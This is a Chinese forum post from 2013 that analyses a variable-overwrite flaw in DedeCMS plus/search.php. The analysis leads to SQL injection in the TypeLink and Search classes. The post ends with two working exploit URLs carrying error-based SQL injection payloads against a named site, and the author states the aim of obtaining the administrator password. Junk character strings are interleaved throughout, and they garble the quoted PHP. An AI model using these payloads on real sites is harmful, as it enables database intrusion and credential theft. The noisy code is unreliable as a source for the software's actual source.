微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.+ Q. y5 M" f) N+ Q! o5 {: n
作者: c4rp3nt3r@0x50sec.org
8 n0 ~+ \5 @, \6 o& ADedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.3 J% z6 Q t2 G) v; q1 `, |; ?
3 A0 b( K& n; X* X2 T/ V. v9 ~- f) M @
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.! Q7 j* q/ W4 t4 ]7 M2 x
- b1 V) G6 ?* |( r2 t
============9 D- U2 q8 F# P7 H. O% o( z, u
9 ^" { W# P5 Q( B$ t$ z; p: T
/ T8 q0 ?/ D: i; X! j, ]8 zDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
3 | {* w; [9 e5 ~5 s! g. H
# ~; u6 ]. k0 j+ h. W4 vrequire_once(dirname(__FILE__).”/../include/common.inc.php”);( T, ?' c; z8 w' l7 V z
require_once(DEDEINC.”/arc.searchview.class.php”);
6 h3 t l$ I5 b% J0 b& D ( k3 X3 R. G& ~) Y8 }
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
' W$ ~. F% X& }7 P, ?+ k% J$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
- f0 ^9 q1 O) ]% {* Y& B0 Q8 \; i$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
7 ~* M7 q; P& H9 {- u9 n$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;9 s( F* P/ _- `2 w$ v: K
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
2 [ \ P4 }" W4 w ( b7 M) C3 V# @- ]2 S! Y2 J
if(!isset($orderby)) $orderby=”;
" f: v! P4 ]7 f# B+ ?+ D) e8 aelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);, U; `2 X4 u8 x- [1 ?! R7 `
& [! u6 n- f3 k& O8 y3 U5 s" c
7 ^& \' |( j5 j: e8 Pif(!isset($searchtype)) $searchtype = ‘titlekeyword’;
4 A. H, y) g D5 R% Y9 D# q: pelse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);$ I% V7 n/ }9 Q8 {
0 T1 n) p3 C1 k1 o- g5 [$ S
if(!isset($keyword)){
X1 H# b4 I5 z* S% W/ S if(!isset($q)) $q = ”;
9 Z/ ~5 m- _, z8 T& _1 d $keyword=$q;& }$ ]7 A, T' h! n, g h6 ]
}2 q0 X8 y7 a! }" K; f+ k/ ~
" E; {3 N* [4 [$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));+ b: F2 k5 ?3 L, ?5 U0 x0 k% L
5 {( F8 D: k* H M3 m/ Z: }- [
//查找栏目信息6 v' `. W) d; w! |# n
if(empty($typeid))
' R3 ?$ H! ^4 a& h' E{
) t4 o: U$ ?6 X! G $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
% P% x7 a" y& @0 W1 D if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )8 S; E& V& ~7 V' N" W8 F/ S
{* r0 q% h% N1 ^. M
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
. r5 t" u1 e! @ _ fwrite($fp, “<”.”?php\r\n”);
$ n5 {) k$ f4 U6 g $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
( Q4 E7 S3 H/ _: d $dsql->Execute(); q3 k F& O, a- l$ n
while($row = $dsql->GetArray())
' z9 l) Y9 V2 V( Y" y! H {) R! C9 ]. a+ d" z
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
) _7 n J; t8 L& V9 W }
* U3 {5 L+ v6 _& p- n fwrite($fp, ‘?’.'>’);
- j6 J2 j3 J |9 z fclose($fp);* ~3 h6 S/ ^% K! M* q. N$ a
} J8 @" H" p; Y3 W7 V0 }
//引入栏目缓存并看关键字是否有相关栏目内容
( n9 I9 }% l Y9 f* }. l require_once($typenameCacheFile);( a- @0 K1 U J) C& z9 i2 Y m
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个2 O/ Y! k8 X$ h$ h
//
' j' u3 c" ^0 ~# Y5 x if(isset($typeArr) && is_array($typeArr))
: B0 b2 K O) \+ {& ]+ a {) S5 g+ L O- |5 e
foreach($typeArr as $id=>$typename)
' @8 H& E9 K7 x* I% w) S/ D5 V2 A {* _% Z. g% ~2 \3 z$ L9 B' B3 V
" i! `: c& T& G0 s <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过% r& h: H* G l5 R1 F
if($keyword != $keywordn)
$ v3 u# X4 h y" G! e9 x! |, o {
4 ]9 ^/ _6 q& F2 H) e $keyword = $keywordn;
" K1 G- b" m' g2 ], O <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设& Y, K( _4 N9 r
break;
% `6 F6 X9 _) _ }
# Q0 n% y Q% v6 q }1 u; q3 L9 k8 j3 o! G" s% Y
}
4 u/ d9 X7 Y) l1 C9 z& H}1 x7 r7 B; ]. R2 I& }" D+ s4 Y
然后plus/search.php文件下面定义了一个 Search类的对象 .
: K% `( J8 Q% D; n8 T% }0 {) h在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
' R/ S! e: q: Y4 r3 ]$this->TypeLink = new TypeLink($typeid);
9 A4 H7 c" O) w+ c* I( A Y 0 i. ^+ N' i' X4 {% R7 |* r
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
2 n c. P, j) Q" t# L' c/ E1 l7 ?
9 h2 X+ @' ^' f6 |1 R8 o5 U& d& Sclass TypeLink4 a# a, \3 K/ }1 p+ t) I
{9 R2 z6 d6 t0 g* O; h, b4 [
var $typeDir;
6 [+ _) H6 N$ n( b var $dsql;. j7 r- J/ F5 \+ {3 b w
var $TypeID;3 ~, l" h! d; Y/ _+ ]
var $baseDir;
0 I9 |. w) y9 h" M0 D+ F var $modDir;3 c, q& `( D* s, v) e& ?5 V% u7 k" q
var $indexUrl;/ G; K0 }1 z. O2 {# i* M
var $indexName;
- [/ _+ M( [+ O3 A) I8 D+ U; ?6 { var $TypeInfos;
& x2 E7 M% D. i2 j, I var $SplitSymbol;
, ^! [( M; V" x var $valuePosition;; c; r0 r4 |& \! A4 x: j1 V* y
var $valuePositionName; P0 n: z5 `5 M: b
var $OptionArrayList;//构造函数///////
3 `- |: _% e; p" ~. s3 j //php5构造函数6 h1 J l* c8 k
function __construct($typeid)
! |4 Q0 H& M, E' L6 k: l {# }8 l$ K2 M, Y F* ?" R2 q" p6 H
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];$ U \4 `! C+ w9 k: [
$this->indexName = $GLOBALS['cfg_indexname'];
) y1 M# q- w( D7 E; d $this->baseDir = $GLOBALS['cfg_basedir'];
9 W6 K$ A/ J# \/ I8 l8 ^ $this->modDir = $GLOBALS['cfg_templets_dir'];( B) |! W( G3 L P* L
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];8 O7 w1 p' `7 F% D+ m" w, d/ `' J& C' c
$this->dsql = $GLOBALS['dsql'];
' d4 z% g0 i. q0 R$ J( O! V; E $this->TypeID = $typeid;
3 t V! D4 K/ j8 z, p$ I2 }* {9 V $this->valuePosition = ”;
1 f' X( ~% ?- P" S l" m $this->valuePositionName = ”;' \& y3 @- m7 q- o
$this->typeDir = ”;
/ Y7 ^7 R4 ^9 R1 S $this->OptionArrayList = ”;
+ g/ R' O. k2 i- A6 \
B1 u- r2 g- \7 y" R/ N0 P' c6 ~ //载入类目信息( Y# m* |. h8 l; Y4 z3 m
! [: G5 F. Z, a1 _" H* w& R <font color=”Red”>$query = “SELECT tp.*,ch.typename as
9 z2 M8 I8 D" U, ^6 M: qctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join) c# D: U9 S+ B3 h
`#@__channeltype` ch
" Y; o) _$ ]7 u( r7 J8 @& {% q on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿- i* B1 m- L+ Z: ?6 X5 ~% ]
! p; ~/ K! ~! a7 X- [* G
if($typeid > 0)
7 x' _, @& H/ p% m& b) p# ]! ~ {0 k3 Z/ K3 h' G: i
$this->TypeInfos = $this->dsql->GetOne($query);4 _4 n ?. `2 c& A
利用代码一 需要 即使magic_quotes_gpc = Off
, |( W6 h0 Z- E+ b4 L8 b6 ^ b) e0 L , ~4 w- a( j3 G. L' W5 \: x
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title+ [* z9 b: @2 z. d3 q+ T
. D5 I6 E7 v# ^- P, @$ h! e
这只是其中一个利用代码… Search 类的构造函数再往下
- L! h% A4 L# U( K ' `/ a7 |1 d' i* _& `
……省略7 T; C. \) z0 K4 D
$this->TypeID = $typeid;
( q5 A+ M2 L: I: @* \( {3 u……省略
1 T/ s3 N+ y0 T& xif($this->TypeID==”0″){
, }4 `# ~" f- n7 b $this->ChannelTypeid=1;' X( v& U- n/ m0 g
}else{ K% L% N) u% r* k7 }
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲! W' R2 V! f+ s8 G5 v
//现在不鸡肋了吧亲…
8 K' z( J* Y( Y" Q. {0 B5 r $this->ChannelTypeid=$row['channeltype'];" Q9 S1 ^9 D; ~6 B0 x) m8 z* V9 ^9 T
0 _8 X. Y. C6 E. W* K5 b; d
}
" _$ x7 q2 ~5 D9 Y( v利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
; Z3 }7 d' q/ x* B, s/ q
B, u# D9 L- c+ [0 ]7 hwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title) i5 k s( v6 M
1 E' _9 f; P( E6 p( \ s
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
) U4 ~% a4 c( `: E n# m4 S4 p |
发表于 2013-1-19 08:18:56
收藏
支持
反对